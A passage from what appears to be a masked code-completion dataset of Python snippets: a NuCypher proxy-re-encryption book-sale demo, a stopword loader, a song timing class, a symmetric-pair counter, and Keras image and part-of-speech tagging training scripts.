known_certificates_dir=CERTIFICATE_DIR))\nauthor.character.start_learning_loop(now=True)\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True, known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10,\n book_store_delivery.deliver_purchase)\n(author_public_key, policy_public_key, data_source_public_key, label, kit\n ) = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\ndatasource_as_understood_by_bob = DataSource.from_public_keys(policy_public_key\n =policy_public_key, datasource_public_key=data_source_public_key, label\n =label)\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(\n author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob, alice_verifying_key=\n alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n",
"step-5": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\n\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open(\"examples-runtime-cruft/node-metadata-{}\".format(teacher_rest_port), \"r\") as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint(\"Will learn from {}\".format(URSULA))\nSHARED_CRUFTSPACE = \"{}/examples-runtime-cruft\".format(os.path.dirname(os.path.abspath(__file__)))\nCRUFTSPACE = \"{}/drm\".format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = \"{}/certs\".format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\nclass ETHAccount(object):\n def send_eth_to(self, to, amount):\n return(to.fallback(self, amount))\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n def __init__(self, author):\n self.author = author\n self.content = b\"PlainText of the book\"\n self.label = b\"book\"\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print(\"Received %s ETH from %s\" % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return(self.purchase_event_hook(sender))\n\nclass BookStoreDelivery(object):\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,\n expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self.book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)\n\n\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=RestMiddleware(),\n known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR,))\nauthor.character.start_learning_loop(now=True)\n\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)\nauthor_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, # The label - he needs to know what data he's after.\n bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.\n # He can also bootstrap himself onto the network more quickly\n # by providing a list of known nodes at this time.\n node_list=[(\"localhost\", 3601)]\n )\ndatasource_as_understood_by_bob = DataSource.from_public_keys(\n policy_public_key=policy_public_key,\n datasource_public_key=data_source_public_key,\n label=label\n )\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob,\n alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n\n\n",
"step-ids": [
14,
19,
20,
22,
23
]
}
|
[
14,
19,
20,
22,
23
] |
import os as os
import io as io
import re
class Stopwords:
def __init__(self, base_dir='data'):
self.base_dir = base_dir
def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):
# Load stopwords from file.
if base_dir is not None:
self.base_dir = base_dir
filename = os.path.join(self.base_dir, stopwords_file)
self.stopwords = []
pattern = re.compile('[\r\n]')
with open(filename, 'r', encoding='utf-8') as fin:
self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]
return self.stopwords
|
normal
|
{
"blob_id": "dad4e14da734f2e2329f4cbe064c73c82a4ae27c",
"index": 8119,
"step-1": "<mask token>\n\n\nclass Stopwords:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin\n ]\n return self.stopwords\n",
"step-4": "import os as os\nimport io as io\nimport re\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin\n ]\n return self.stopwords\n",
"step-5": "import os as os\nimport io as io\nimport re\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n # Load stopwords from file.\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]\n return self.stopwords",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from Song import Song
class FroggyWoogie(Song):
def __init__(self):
super(FroggyWoogie, self).__init__()
self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'
self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [
24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,
'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118
], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [
113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,
64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',
16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],
[244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,
32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',
16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]
|
normal
|
{
"blob_id": "1df1081308ead28c023774a8671df8a0671a1bba",
"index": 4177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FroggyWoogie(Song):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass FroggyWoogie(Song):\n\n def __init__(self):\n super(FroggyWoogie, self).__init__()\n self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'\n self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [\n 24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,\n 'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118\n ], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [\n 113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,\n 64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',\n 16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],\n [244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,\n 32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',\n 16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]\n",
"step-4": "from Song import Song\n\n\nclass FroggyWoogie(Song):\n\n def __init__(self):\n super(FroggyWoogie, self).__init__()\n self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'\n self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [\n 24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,\n 'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118\n ], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [\n 113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,\n 64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',\n 16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],\n [244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,\n 32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',\n 16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
2. Schreiben Sie die Anzahl von symmetrischen Paaren (xy) und (yx).
"""
def symetrisch(x, y):
"""
bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind
:param x: ein Element der Liste
:param y: ein Element der Liste
:return: True- wenn x und y symetrisch
False - sonst
"""
if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):
return True
else:
return False
def anz_von_sym(lst):
"""
mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste
:param lst: die Liste
:return: Anzahl der symetrischen Paaren der Liste
"""
anz = 0
for i in range(len(lst) - 1):
for j in range(i, len(lst)):
if symetrisch(lst[i], lst[j]):
anz += 1
print("Anzahl symmetrischer Paaren:", anz)
|
normal
|
{
"blob_id": "2c6dc4d55f64d7c3c01b3f504a72904451cb4610",
"index": 6532,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if x % 10 == y // 10 and x // 10 == y % 10:\n return True\n else:\n return False\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if x % 10 == y // 10 and x // 10 == y % 10:\n return True\n else:\n return False\n\n\ndef anz_von_sym(lst):\n \"\"\"\n mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste\n :param lst: die Liste\n :return: Anzahl der symetrischen Paaren der Liste\n \"\"\"\n anz = 0\n for i in range(len(lst) - 1):\n for j in range(i, len(lst)):\n if symetrisch(lst[i], lst[j]):\n anz += 1\n print('Anzahl symmetrischer Paaren:', anz)\n",
"step-4": "\"\"\"\n2. Schreiben Sie die Anzahl von symmetrischen Paaren (xy) und (yx).\n\"\"\"\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):\n return True\n else:\n return False\n\n\ndef anz_von_sym(lst):\n \"\"\"\n mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste\n :param lst: die Liste\n :return: Anzahl der symetrischen Paaren der Liste\n \"\"\"\n anz = 0\n for i in range(len(lst) - 1):\n for j in range(i, len(lst)):\n if symetrisch(lst[i], lst[j]):\n anz += 1\n print(\"Anzahl symmetrischer Paaren:\", anz)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import PIL
from matplotlib import pyplot as plt
import matplotlib
from keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.callbacks import EarlyStopping
from keras import backend as K
import keras
from time import time
from sklearn.metrics import classification_report, confusion_matrix
import numpy as np
#model = load_model("./Modelo_C32K44_C128k44_d075_D256_d05_D5.h5")
#model = load_model("./Modelo_C32k55_C64k55_d025_D128_d05_D5.h5")
model = load_model("./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5")
model.fit
batch_size = 20
epochs = 100
train_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'
validation_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=15,
zoom_range=0.1
)
validation_datagen = ImageDataGenerator(
rescale=1./255
)
validation_datagen = ImageDataGenerator(
rescale=1./255
)
validation_generator = validation_datagen.flow_from_directory(
validation_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
validation_generator = validation_datagen.flow_from_directory(
validation_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
history = model.fit_generator(
train_generator,
epochs=epochs,
validation_data = validation_generator,
#callbacks = [es]
)
model.save("./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5")
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='validation accuracy')
plt.plot(history.history['val_loss'], label='val_loss')
plt.plot(history.history['loss'], label='loss')
plt.title('Accuracy y Loss Clasificando coches por color')
plt.xlabel('Épocas')
plt.legend(loc="lower right")
plt.show()
|
normal
|
{
"blob_id": "d2f760b821fc5c599cda1091334364e18234ab06",
"index": 4222,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmodel.fit\n<mask token>\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-3": "<mask token>\nmodel = load_model('./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nmodel.fit\nbatch_size = 20\nepochs = 100\ntrain_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\n )\nvalidation_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n )\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255, rotation_range=15,\n zoom_range=0.1)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size=(250, 150), batch_size=batch_size, class_mode='categorical')\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\nhistory = model.fit_generator(train_generator, epochs=epochs,\n validation_data=validation_generator)\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-4": "import PIL\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import EarlyStopping\nfrom keras import backend as K\nimport keras\nfrom time import time\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\nmodel = load_model('./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nmodel.fit\nbatch_size = 20\nepochs = 100\ntrain_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\n )\nvalidation_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n )\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255, rotation_range=15,\n zoom_range=0.1)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size=(250, 150), batch_size=batch_size, class_mode='categorical')\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\nhistory = model.fit_generator(train_generator, epochs=epochs,\n validation_data=validation_generator)\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-5": "import PIL\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import EarlyStopping\nfrom keras import backend as K\nimport keras\nfrom time import time\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\n\n#model = load_model(\"./Modelo_C32K44_C128k44_d075_D256_d05_D5.h5\")\n#model = load_model(\"./Modelo_C32k55_C64k55_d025_D128_d05_D5.h5\")\nmodel = load_model(\"./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5\")\nmodel.fit\nbatch_size = 20\nepochs = 100\n\ntrain_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\nvalidation_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n rotation_range=15,\n zoom_range=0.1\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255\n)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\nhistory = model.fit_generator(\n train_generator,\n epochs=epochs,\n validation_data = validation_generator,\n #callbacks = [es]\n)\n\nmodel.save(\"./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5\")\n\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\n\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc=\"lower right\")\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
sys.path.append("..")
import helpers
helpers.mask_busy_gpus(wait=False)
import nltk
import numpy as np
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])
from sklearn.cross_validation import train_test_split
train_data,test_data = train_test_split(data,test_size=0.25,random_state=42)
from collections import Counter
word_counts = Counter()
for sentence in data:
words,tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])
#print(all_words)
#let's measure what fraction of data words are in the dictionary
print("Coverage = %.5f"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))
from collections import defaultdict
word_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})
tag_to_id = {tag:i for i,tag in enumerate(all_tags)}
def to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len,lines))
matrix = np.empty([len(lines),max_len],dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]
matrix[i,:len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print("Word ids:")
print(to_matrix(batch_words,word_to_id))
print("Tag ids:")
print(to_matrix(batch_tags,tag_to_id))
import keras
import keras.layers as L
from keras.utils.np_utils import to_categorical
BATCH_SIZE=32
def generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):
assert isinstance(sentences,np.ndarray),"Make sure sentences is q numpy array"
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0,len(indices)-1,batch_size):
batch_indices = indices[start:start+batch_size]
batch_words,batch_tags = [],[]
for sent in sentences[batch_indices]:
words,tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words,word_to_id,max_len,pad)
batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)
batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))
yield batch_words,batch_tags_1hot
def compute_test_accuracy(model):
test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)
#predict tag probabilities of shape [batch,time,n_tags]
predicted_tag_probabilities = model.predict(test_words,verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
#compute accurary excluding padding
numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))
denominator = np.sum(test_words != 0)
return float(numerator)/denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self,epoch,logs=None):
sys.stdout.flush()
print("\nMeasuring validation accuracy...")
acc = compute_test_accuracy(self.model)
print("\nValidation accuracy: %.5f\n"%acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None],dtype='int32'))
model.add(L.Embedding(len(all_words),50))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
#
#
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.Conv1D(128,2,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,3,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,4,padding='same',activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
#model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags),activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
model.summary()
model.compile('adam','categorical_crossentropy')
model.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,
callbacks=[EvaluateAccuracy()], epochs=50,)
acc = compute_test_accuracy(model)
print("\nFinal accuracy: %.5f"%acc)
model.save_weights("LSTM_gpu_trained_weights_1layer.h5")
|
normal
|
{
"blob_id": "7f7ebc6d3d69fbb19071c63a9ab235ad01f1d414",
"index": 306,
"step-1": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\n<mask token>\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
